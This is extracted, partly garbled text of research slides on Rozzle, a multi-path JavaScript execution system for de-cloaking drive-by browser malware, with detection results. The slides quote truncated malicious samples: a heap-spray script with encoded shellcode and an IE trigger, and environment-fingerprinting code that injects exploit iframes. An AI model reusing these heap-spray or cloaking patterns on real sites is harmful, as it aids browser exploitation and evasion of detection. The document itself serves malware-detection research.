Rozzle DeCloaking Internet Malware Presenter Yinzhi Cao Slides

  • Slides: 43
Download presentation
Rozzle De-Cloaking Internet Malware Presenter: Yinzhi Cao Slides by Ben Livshits with Clemens Kolbitsch,

Rozzle De-Cloaking Internet Malware Presenter: Yinzhi Cao Slides by Ben Livshits with Clemens Kolbitsch, Ben Zorn, Christian Seifert, Paul Rebriy Microsoft Research

Static – Dynamic Analysis Spectrum + High precision - High overhead - Low coverage

Static – Dynamic Analysis Spectrum + High precision - High overhead - Low coverage precision + High DART, SAGE, KLEE + High scalability + High precision + Scales reasonably well + High coverage ? High - Low precision - Watch outcoverage for resource usage - May not scale Entirely static Symbolic execution Multi-execution Entirely runtime 2

Blacklisting Malware in Search Results 3

Blacklisting Malware in Search Results 3

Motivation Haha, I cannot belive this guy actually does this!! LOL 4

Motivation Haha, I cannot belive this guy actually does this!! LOL 4

5

5

Drive-by Malware Detection Landscape offline (honey-monkey) Nozzle [Usenix Security ’ 09] online (browser-based) •

Drive-by Malware Detection Landscape offline (honey-monkey) Nozzle [Usenix Security ’ 09] online (browser-based) • Instrumented browser • Looks for heap sprays • Moderately high overhead runtime static Zozzle [Usenix Security ’ 11] • Mostly static detection • Low overhead, high reach • Can be deployed in browser 6

Search Engine Crawling 7

Search Engine Crawling 7

Malware Cloaking <script> if (navigator. user. Agent. index. Of(‘IE 6’)>=0) { var x=unescape(‘%u 4149%u

Malware Cloaking <script> if (navigator. user. Agent. index. Of(‘IE 6’)>=0) { var x=unescape(‘%u 4149%u 1982%u 90 […]’); eval(x); } </script> Server side Client detect vulnerable detect crawler target • • • • Fingerprint browser Source & plugin. IPversions Request (User. Do this using Agent, Browser ID) Java. Script 8

Client-side Cloaking Defense Traditional Rozzle • Single browser, one visit • Appear as vulnerable

Client-side Cloaking Defense Traditional Rozzle • Single browser, one visit • Appear as vulnerable as possible 9

Background and Related Work • Drive-by Download – Exploit a client-side browser vulnerability and

Background and Related Work • Drive-by Download – Exploit a client-side browser vulnerability and thus trigger a malware downloaded into client – It can be divided into Six steps. • Description of Six Steps • Comparing with JShield 10

Step One: visiting malicious web site • On this stage, a benign user is

Step One: visiting malicious web site • On this stage, a benign user is visiting a malicious web site. • Defense mechanism: if this web site is detected as malicious, a warning can be shown to prevent the benign user from visiting the web site (like Google Safe Browsing). 11

Step Two: Executing Java. Script • After downloading contents to the client, Java. Script

Step Two: Executing Java. Script • After downloading contents to the client, Java. Script get executed. • Related Work: Current works are trying to fully execute Java. Script to get a better detection rate. – Zozzle ([Usenix, 2011]): Executing Java. Script – Wepawet: Executing Java. Script and extracting Java. Script from pdf – Rozzle ([Oakland, 2012]): Symbolic execution + fingerprinting Java. Script 12

Step Three: Heap Spraying • Java. Script will fill the heap with shellcode. •

Step Three: Heap Spraying • Java. Script will fill the heap with shellcode. • Defense Mechanism: – Zozzle ([Usenix, 2011]): Machine learning – Nozzle ([Usenix, 2009]): Detecting if the heap is executable or not. 13

Step Four: Exploit a certain vulnerability • Java. Script code will use certain pattern

Step Four: Exploit a certain vulnerability • Java. Script code will use certain pattern to trigger a native browser vulnerability. • Defense mechanism: – Browser. Shield: Rewrite Java. Script and check if an operation will trigger the vulnerability or not. For example, the length of an operation. 14

Step Five: Downloading malware • After exploiting native browser vulnerability, malware is downloaded into

Step Five: Downloading malware • After exploiting native browser vulnerability, malware is downloaded into client. • Defense Mechanism: – Blade ([CCS, 2010]): Detect the GUI of downloading. If it is not from a normal GUI, reject the downloaded file. 15

Step Six: Executing malware • After malware is downloaded, it will get executed. •

Step Six: Executing malware • After malware is downloaded, it will get executed. • Related Work: – Spy. Proxy ([Usenix, 07]) – Web. Shield ([NDSS, 11]) – Provos et al. ([Usenix, 08]) 16

Overview • Background & Motivation: Cloaking • Detecting Internet Malware • Rozzle: Fighting Evasion

Overview • Background & Motivation: Cloaking • Detecting Internet Malware • Rozzle: Fighting Evasion • Experiments

Detecting Internet Malware Nozzle: A Defense Against Heap-spraying Zozzle: Code. Low-overhead Mostly Static Java.

Detecting Internet Malware Nozzle: A Defense Against Heap-spraying Zozzle: Code. Low-overhead Mostly Static Java. Script Injection Attacks Malware Detection [Usenix Security 2011] • Bayesian classification of hierarchical features of the Scan heap allocated objects to identify valid. Java. Script x 86 codeabstract syntax tree. In the browser (after sequences unpacking) [Usenix Security 2009] Nozzle Zozzle 6/ 5/ 20 20 3/ 6/ 1/ 11 20 6/ 11 7/ 20 6/ 11 9/ 2 6/ 01 11 1 /2 6/ 01 13 1 /2 6/ 01 15 1 /2 6/ 01 17 1 /2 6/ 01 19 1 /2 6/ 01 21 1 /2 6/ 01 23 1 /2 6/ 01 25 1 /2 6/ 01 27 1 /2 6/ 01 29 1 /2 01 1 Static Detection 11 Dynamic Detection 6/ • 18

Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad 19

Nozzle: Runtime Heap Spraying Detection Normalized attack surface (NAS) good bad 19

Zozzle: Static/Statistical Detection // Shellcode var shellcode=unescape(‘%u 9090%uceba%u 11 fa%u 291 f%ub 1 c

Zozzle: Static/Statistical Detection // Shellcode var shellcode=unescape(‘%u 9090%uceba%u 11 fa%u 291 f%ub 1 c 9%udb 33 unescape […]′); bigblock=unescape(“%u 0 D 0 D”); bigblock unescape %u 0 D 0 D headersize=20; shellcodesize=headersize+shellcode. length; shellcodesize shellcode. length while(bigblock. length<shellcodesize){bigblock+=bigblock; } heapshell=bigblock. substring(0, shellcodesize); bigblock. substring shellcodesize nopsled=bigblock. substring(0, bigblock. length-shellcodesize); nopsled bigblock. substring bigblock. length shellcodesize while(nopsled. length+shellcodesize<0× 25000){nopsled=nopsled+heapshell} nopsled. length shellcodesize nopsled heapshell // Spray var spray=new Array(); spray nopsled shellcode for(i=0; i<500; i++){spray[i]=nopsled+shellcode; } // Trigger function trigger(){ varbdy = document. create. Element(‘body’); varbdy. add. Behavior #default#user. Data varbdy. add. Behavior(‘#default#user. Data’); document. append. Child varbdy document. append. Child(varbdy); try { for (iter=0; iter<10; iter++) { varbdy. set. Attribute(‘s’, window); } } catch(e){ } window. status+=”; } butid document. get. Element. By. Id(‘butid’). onclick(); 20

Overview • Background & Motivation: Cloaking • Detecting Internet Malware • Rozzle: Fighting Evasion

Overview • Background & Motivation: Cloaking • Detecting Internet Malware • Rozzle: Fighting Evasion • Experiments

Environment Fingerprinting Prevents Detection Nozzle Zozzle <script> • In 7. 7% of JS files,

Environment Fingerprinting Prevents Detection Nozzle Zozzle <script> • In 7. 7% of JS files, code gets a var adobe=new Active. XObject(‘Acro. PDF’); <script> var (‘$version’); reference to environment if adobe. Version=adobe. Get. Variable (navigator. user. Agent. index. Of(‘IE 6’)>=0) Is this a practical problem for if (navigator. user. Agent. index. Of(‘IE 6’)>=0 && { • ==In’ 9. 1. 3’) 1. 2%, code branches on such our malware detectors? adobe. Version var x=unescape(‘%u 4149%u 1982%u 90 […]’); { eval(x); sensitive values […]’); }var x=unescape(‘%u 4149%u 1982%u 90 • 89. 5% of malicious JS branches eval(x); </script> } on such values </script> 22

Typical Malware Cloaking 23

Typical Malware Cloaking 23

More Complex Fingerprinting Fingerprint: Q 0193807 F 127 J 14 24

More Complex Fingerprinting Fingerprint: Q 0193807 F 127 J 14 24

Avoiding Dynamic Crawlers 25

Avoiding Dynamic Crawlers 25

Avoiding Static Detection 26

Avoiding Static Detection 26

How to Allocate Detection Resources? Rozzle 1. 4 1. 5 2. 0 9. 1

How to Allocate Detection Resources? Rozzle 1. 4 1. 5 2. 0 9. 1 10. 0 8 9 10 … … How many resources Clearly does not scale should allocated to is What ifbe the site simply filternot malicious sites? malicious? 27

Rozzle Multi-path execution framework for Java. Script What it is/does What it is not

Rozzle Multi-path execution framework for Java. Script What it is/does What it is not • Multiple browser profiles on single machine • • Branch on environmentsensitive checks No forking No snapshotting • Symbolic execution: reverting to a previous state similar to running multiple browsers in parallel • • • Execute individual branches sequentially to increase coverage Cluster of machines: too resource consuming • Static analysis: Retain much of runtime precision 28

Multi-Execution in Rozzle <script> var adobe=new Active. XObject(‘Acro. PDF’); var adobe. Version=adobe. Get. Variable

Multi-Execution in Rozzle <script> var adobe=new Active. XObject(‘Acro. PDF’); var adobe. Version=adobe. Get. Variable (‘$version’); if (navigator. user. Agent. index. Of(‘IE 7’)>=0 && adobe. Version == ’ 9. 1. 3’) { var x=unescape(‘%u 4149%u 1982%u 90 […]’); eval(x); } else if (adobe. Version == ’ 8. 0. 1’) { var x=unescape(‘%u 4073%u 8279%u 77 […]’); eval(x); } … </script> 29

Challenges Consistent updates of variables Introduce concept of Symbolic Memory: • Multiple concrete values

Challenges Consistent updates of variables Introduce concept of Symbolic Memory: • Multiple concrete values associated with one variable • New Java. Script data type Symbolic • 3 subtypes • symbolic value / formula / conditional • Weak updates for conditional assignments 30

Symbolic Memory Variable : user. Agent. String Value : 0 < navigator. user. Agent

Symbolic Memory Variable : user. Agent. String Value : 0 < navigator. user. Agent > Symbolic : no yes <script> var user. Agent. String=0; user. Agent. String = navigator. user. Agent; var is. IE; is. IE = (user. Agent. String. index. Of(‘IE’)>=0); … Hooks into engine, return symbolic values for • Sensitive global objects: navigator. user. Agent, Variable : is. IE navigator. platform, … Value : < navigator. user. Agent. index. Of(‘IE’) >= 0 > • Sensitive functions: Script. Engine(), allocation of Symbolic : yes Active. XObject, … 31

Symbolic Memory Variable : is. IE Value : < nav. user. Agent. index. Of(…)>=0

Symbolic Memory Variable : is. IE Value : < nav. user. Agent. index. Of(…)>=0 Value : false > ? true : false Symbolic : yes Symbolic : no Variable : is. IE 7 Value false <…> : Symbolic : no yes <script> var is. IE=false; var is. IE 7=false; if (navigator. user. Agent. index. Of(‘IE’)>=0) { is. IE=true; if (navigator. user. Agent. index. Of(‘IE 7’)>=0) { is. IE 7=true; Current path predicate } Value : : << nav. user. Agent. index. Of(. . )>=0 Value nav. user. Agent. index. Of(. . )>=0 >> && } Symbolic : yes < nav. user. Agent. index. Of(. . )>=0 > if (is. IE 7) Symbolic : yes { … 32

Symbolic Memory Variable : is. IE Value : < nav. user. Agent. index. Of(…)>=0

Symbolic Memory Variable : is. IE Value : < nav. user. Agent. index. Of(…)>=0 > ? true : false Symbolic : yes ? >= true false index Of 0 navigator. user. Agent ‘IE’ 33

Challenges • try-blocks regularly used to test availability • Handling symbolic values when they

Challenges • try-blocks regularly used to test availability • Handling symbolic values when they are… of plugins (Active. XObjects) — … written to the DOM • catch-blocks default values, cannot be Consistent updates — …set sent to a remote server Handling loops ignored — … executed (as part of eval) of variables • Execute -statementtosimilar to else • catch Lazy evaluation concrete values (only when branch, add virtual if-condition: “ Active. X needed) supported” • Loop condition might be symbolic, number of iterations unknown! • • Indirect control Unroll k iterations (currently k=1) flow: Exception I/O Instruction pointer checks (endless handling loops/recursion) 34

Experiments Offline • Controlled Experiment • 7 x more Nozzle detections Online • Similar

Experiments Offline • Controlled Experiment • 7 x more Nozzle detections Online • Similar to Bing crawling • Almost 4 x more Nozzle detections • 10. 1% more Zozzle detections Overhead • 1. 1% runtime overhead • 1. 4% memory overhead 35

Offline • Exploits hosted on our server • Minimize external influences • 70, 000

Offline • Exploits hosted on our server • Minimize external influences • 70, 000 known malicious scripts (flagged by Zozzle) • Fully unrolled/de-obfuscated exploits, wrapped in HTML Shared New Detections Errors Zo z zle 70 k 10, 381 +595% runtime detections -2, 000 0 2, 000 4, 000 6, 000 8, 000 10, 000 12, 000 36

Online • Dedicated machine for crawling the web • Clone of the Bing malware

Online • Dedicated machine for crawling the web • Clone of the Bing malware crawler • List of URLs recently crawled by Bing • Pre-filtering: Increase likelihood of finding malicious sites • 57, 000 URLs over the last week Nozzle Detections Zozzle Detections 225 24 156 50 174 2, 510 +203% runtime detections 37

Overhead • Average numbers of 3 repeated runs per configuration • Base runs (cookie

Overhead • Average numbers of 3 repeated runs per configuration • Base runs (cookie setup) • 500 randomly selected URLs crawled by Bing • Slightly biased towards malicious sites (pre-filtering) Runtime Overhead Memory Overhead Median: 0. 0% Median: 0. 6% 80 th Percentile: 1. 1% 80 th Percentile: 1. 4% 39

1. 0 11 2 2. 140 2. 104 2. 068 1 2. 032 1.

1. 0 11 2 2. 140 2. 104 2. 068 1 2. 032 1. 996 1 1. 960 1. 924 2 1. 888 1. 852 121 1. 816 1. 780 1. 744 1 1. 708 1 1. 672 1. 636 1. 600 1 1. 564 1. 528 1. 492 1. 456 1. 348 1122 1. 420 1 1. 384 1. 312 1. 276 223321 1. 240 1. 204 54 1. 168 7 610 1. 132 12 1. 096 30 1. 060 70 1. 024 5 0. 988 3 112 0. 952 0. 916 32 0. 880 22 0. 844 6 0. 808 0. 772 0. 736 0. 700 Overhead Numbers 100 90 88 80 70 60 50 40 25 20 13 1 40

Take Away For most sites, virtually no overhead Tremendous impact on runtime detector due

Take Away For most sites, virtually no overhead Tremendous impact on runtime detector due to increased path coverage Visible impact on static detector More important with growing trend to obfuscation Also improves other existing tools: Exposes detectors to additional site content 41

Online "x 6 D"+"x 73x 69x 65 "+"x 20x 36" … an example pulled

Online "x 6 D"+"x 73x 69x 65 "+"x 20x 36" … an example pulled from = our DB… "msie 6" if (navigator. user. Agent. to. Lower. Case(). index. Of( "x 6 D"+"x 73x 69x 65"+"x 20x 36")>0) document. write("<iframe src=x 6. htm></iframe>"); if (navigator. user. Agent. to. Lower. Case(). index. Of( "x 6 D"+"x 73"+"x 69"+"x 65"+"x 20"+"x 37")>0) document. write("<iframe src=x 7. htm></iframe>"); "x 6 D"+"x 73"+"x 69"+" try { var a; var aa=new Active. XObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]); x 65"+"x 20"+"x 37" } catch(a) { } finally { = if (a!="[object Error]") "msie 7" document. write("<iframe src=svfl 9. htm></iframe>"); } try { var c; var f=new Active. XObject("O"+"x 57x 43"+"x 31x 30x 2 Ex 53"+[…]); } catch(c) { } finally { "O"+"x 57x 43"+"x 31x 30x 2 Ex 5 if (c!="[object Error]") { aacc = "<iframe src=of. htm></iframe>"; 3"+"pr"+"ea"+"ds"+"he"+"et" set. Timeout("document. write(aacc)", 3500); = } } "OWC 10. Spreadsheet" 42

Summary • Rozzle: Multi-profile execution – Look as vulnerable as possible – Improve existing

Summary • Rozzle: Multi-profile execution – Look as vulnerable as possible – Improve existing malware detectors • Implementation: – Implemented on top of IE 9’s Java. Script engine – Still some flaws, promising results • Idea of multi-execution is promising in other contexts 45

Static – Dynamic Analysis Spectrum + High precision - High overhead - Low coverage

Static – Dynamic Analysis Spectrum + High precision - High overhead - Low coverage DART, SAGE + High precision + High scalability + Scales reasonably well + High coverage ? High out coverage - Low precision - Watch for resource usage - May not scale Entirely static Symbolic execution Multi-execution Entirely runtime 46